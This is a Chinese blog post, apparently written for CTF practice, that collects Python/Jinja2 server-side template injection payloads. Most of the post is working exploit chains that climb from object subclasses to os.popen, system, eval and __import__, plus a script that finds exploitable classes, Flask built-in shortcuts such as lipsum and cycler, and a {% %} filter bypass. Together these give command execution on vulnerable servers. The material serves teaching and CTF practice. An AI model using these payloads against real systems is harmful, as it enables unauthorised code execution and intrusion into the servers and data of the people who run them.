SSTI(python模板注入)整理

最新推荐文章于 2024-05-11 17:01:53 发布
最新推荐文章于 2024-05-11 17:01:53 发布
阅读量496 收藏 7
点赞数 4
分类专栏: CTF练习 文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45931661/article/details/137499208
版权

漏洞成因

在使用django框架进行web应用设计时,不规范的代码使用。
常用的的dgango代码为:
在这里插入图片描述
还可以设置动态网址,
在这里插入图片描述

python使用的web框架可以使用以下方法进行测试

在这里插入图片描述

攻击链相关类的说明

1.构建父类

''.__class__()

2.构建obg子类

obj.__ bases__()[0]

3.寻找obj的子类

obj.__subclasses__()

使用1,2,3,就可以构建一个寻找函数的攻击链,然后利用返回函数,看是否有漏洞,具体语句为:

''.__class__.__bases__[0].__subclasses__()

4.寻找类的地址

# 输入类的名字
''.__class__.__bases__[0].__subclasses__()[k]
# 寻找类的地址
''.__class__.__bases__[0].__subclasses__()[k].__init__
# 寻找所有全局变量,函数名称的字典,格式为[name:地址或值]
''.__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']
# 调用类的静态变量或者静态函数
''.__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('ls').read()
''.__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['system']('ls')

构造攻击函数链

总结,找到eval、popen、__import__函数,就可以进行getshell
os类里面有popen函数
__builtins__里面有eval、__import__方法
flask内置方法

方法1:
直接调用popen函数,_wrap_close类里面有popen函数

''.__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()

或者system函数
比如

''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__['os'].system('dir')

方法2:
查找有无os的基类,如linecache

''.__class__.__bases__[0].__subclasses__()[250].__init__.__globals__['os'].popen('whoami').read()

对于os基类的寻找,可以使用下面代码:

for i,k in zip(range(len(''.__class__.__bases__[0].__subclasses__())),''.__class__.__bases__[0].__subclasses__()):
    try:
        if k.__init__.__globals__['os']:
            print(k)
            print(i)
    except:
        pass

方法3:
使用__import__函数手动导入了os类

''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__import__']('os').popen('whoami').read()

方法4:
调用builtins类下的多个函数,比如eval和__import__(推荐:这里可以用的类比较多,使用方法2的代码进行查询)
这里以eval为例

''.__class__.__bases__[0].__subclasses__()[250].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")

以__import__为例,推荐使用__globals__[‘builtins’][‘import’]的格式,直接使用.__import__本地会报错。

''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__import__']('os').popen('dir').read()

方法5:
使用flask内置函数,其内置函数可以通过下面代码查看

{{self.__dict__._TemplateReference_context.keys()}}

然后可以简洁代码

# 存在漏洞的函数如下
lipsum、url_for、get_flashed_messages
# 存在漏洞的类如下
cycler,joiner、namesapce、config、request、session
# 函数利用方式如下
lipsum.__globals__['os'].popen('ls').read()
# 类利用方式如下
cycler.__init__.__globals__['os'].popen('ls').read()

{{}}过滤绕过

使用{% xxx %}即可

一只特立独行的猫
关注
专栏目录
python 模板注入
m0_59485658的博客
12-16 500
web 程序包括两个文件:flask-test.py 和 Config.py 文件kali上搭建有漏洞的flask web服务注:以上代码存在ssti漏洞点在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,我们知道Flask 中使用了Jinja2 作为模板渲染引擎,在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把包裹的内容当做变量解析替换。
Python模板注入SSTI
sleepywin的博客
09-11 915
模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码分离。即也拓宽了攻击面,注入模板中的代码可能会引发RCE或XSS。攻击者可利用模板注入漏洞执行任意的python代码,包括读取敏感文件、执行系统命令、访问数据库等。通常会通过在用户输入中插入。模板注入漏洞可能导致攻击者能够执行恶意代码或访问未授权的数据。在python中,常见的模板引擎包括。Jinja2中使用{{...}}或{%...%},使得攻击者能够在模板中插入恶意代码。未正确过滤或转义用户提供的输入时。使用模板引擎解析用户提供的输入。
python模板注入(多种方法,CTF可直接使用)
weixin_47696216的博客
05-21 2125
CTF各种SSTI解题思路与方法
Web_python_template_injection(Python模块注入
Welcome To Myon'Blog !
04-11 1588
Python的模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
python模板注入_SSTI模板注入
weixin_35186171的博客
02-10 852
SSTI是个啥?SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理...
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 986
在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
浅学Go下的ssti模板注入问题
军火库
02-13 553
template之所以称作为模板的原因就是其由静态内容和动态内容所组成,可以根据动态内容的变化而生成不同的内容信息交由客户端,以下即一个简单例子模板内容 Hello, {{.Name}} Welcome to go web programming…期待输出 Hello, liumiaocn Welcome to go web programming…
《从0到1:CTFer成长之路》书籍配套题目-[第三章 web进阶]Python安全问题
weixin_46703850的博客
02-25 1504
《从0到1:CTFer成长之路》书籍配套题目-[第三章 web进阶]Python安全问题
XCTF系列 // Web | php_rce & Web_python_template_injection
qq_45805420的博客
07-26 274
前言 这两题涉及到的知识点有,ThinkPHP 的远程代码执行漏洞 以及 flask的 SSTI 漏洞(服务端模板注入) 。   由于水平有限,关于以上内容的了解均只到表面,具体漏洞原理尚未看明白,详细分析只好以后再补,在这里先参照网上的 writeup,照猫画虎,略微整理分析一下解题思路与流程。 1` php_rce ThinkPHP 是一个轻量级国产 PHP 开发框架,它可以支持 windows/Unix/Linux 等服务器环境。在 ThinkPHP 5 中出现了由于变量覆盖而引起的 RCE(远程命令
【攻防世界】十六、shrine
Hi~ 土拨鼠
09-24 421
打开所给场景,发现给了一段python代码: 整理一下源码进行分析: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_ji.
python安全SSTI模板注入
世间繁华梦一出
08-11 458
python安全——SSTI模板注入SSTI模板注入原理解释 SSTI模板注入原理解释 参考链接 https://xz.aliyun.com/t/7746 SSTI模板注入检测及攻击工具:tplmap
Python-模板注入
m0_51428325的博客
12-26 1887
何为模板注入模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,哲大大提升了开发效率,良好的设计也是的代码重用变得更加容易。 到那时模板引擎也拓宽了我们的攻击面,注入模板中的代码可能会引发RCE或者XSS flask基础 在学习SSTI之前,先把flask的运作流程搞明白,这样有利于更加快速的理解原理 路由 先看一段代码 from flask import flask @app.route('/index/') def hello_word(): .
python模板注入
RoboTerh的博客
08-05 939
ssti漏洞 其漏洞的产生在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内容作为变量解析替换。 漏洞的解决方式: 将template中的<h3>%s!</h3>%url更改为<h3>{{url}}</h3> 这样以来,Jinja2在模板渲染的时候将url的值替换掉{{url}},
Python 开发 框架安全SSTI 模板注入漏洞测试.
最新发布
网络安全领域___专研者.
05-11 582
SSTI (Server-Side Template Injection) 是一种Web应用程序安全漏洞,它发生在应用程序使用模板引擎渲染用户输入时。当应用程序将用户输入直接插入到模板中而不进行充分的过滤和验证时,就可能导致SSTI漏洞。攻击者可以利用这个漏洞注入恶意代码到模板中,从而执行任意命令,窃取敏感信息或者进一步渗透系统。
python SSTI注入
weixin_44843084的博客
06-21 797
https://www.jianshu.com/p/a77c50dfebcb https://xz.aliyun.com/t/3679#toc-9 SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板Web应用可以把输入转换成特定的HTML文件或者email格式 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ...
[渗透测试笔记] 15.python模板注入
H4ppyD0g的博客
08-28 1245
python的html模板使用 def test(): code = request.args.get('id') html = ''' <h3>%s</h3> ''' % (code) return render_template_string(html) 当我们访问页面的时候,py代码通过requests.args.get来获取’id’的值赋给code,然后生成html,然后render_template_string来渲染网页。 模板注入 就是指 将
python 模板注入_SSTI模板注入
weixin_39988930的博客
12-14 529
前言又划水了一天,最后划累了学习了一会,写了这篇文章,又遇到的hexo遇见花括号解析错误的问题,一点点把文章断点才解决(hexo断点调试SSTI介绍SSTI,服务端模板注入攻击,发生在MVA框架的view层中。注入原因:服务端接收了用户的输入,将未过滤的数据传给引擎解析,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题测试SSTI...
python利用什么写模板_Python-模板注入
weixin_39724287的博客
11-24 123
何为模板注入模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易。但是模板引擎也拓宽了我们的攻击面。注入模板中的代码可能会引发RCE或者XSS。flask基础在学习SSTI之前,先把flask的运作流程搞明白。这样有利用更快速的理解原理。路由先看一段代码from flask import flask@app.rout...
SSTI注入——python中的ssti
wwwwyyyrre的博客
06-05 992
python里的运用最多的应该就是flask模板注入 也可以直接用tplmap自动化注入来找到ssti注入python21.2.3.4.5.6.python31.2.
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面返回给浏览器。在SSTI攻击中,恶意注入的有效载荷可以是任意的模板代码,其目的是执行非法操作或者获取敏感信息。 关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令,例如使用`${{7*7}}`来执行简单的算术运算。 2. 通过访问对象的属性和方法来获取敏感信息,例如`{{config.items()}}`来获取应用程序的配置信息。 3. 利用模板语法实现循环、条件语句等控制流程,例如使用`{% for i in range(10) %}...{% endfor %}`来进行循环操作。 4. 调用模板引擎提供的特殊函数和过滤器,例如使用`{{7|safe}}`来禁用自动转义,或者使用`{{user.name|escape}}`来对用户输入进行转义。 请注意,在实际应用中进行SSTI攻击是非法的行为,我强烈建议您不要尝试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值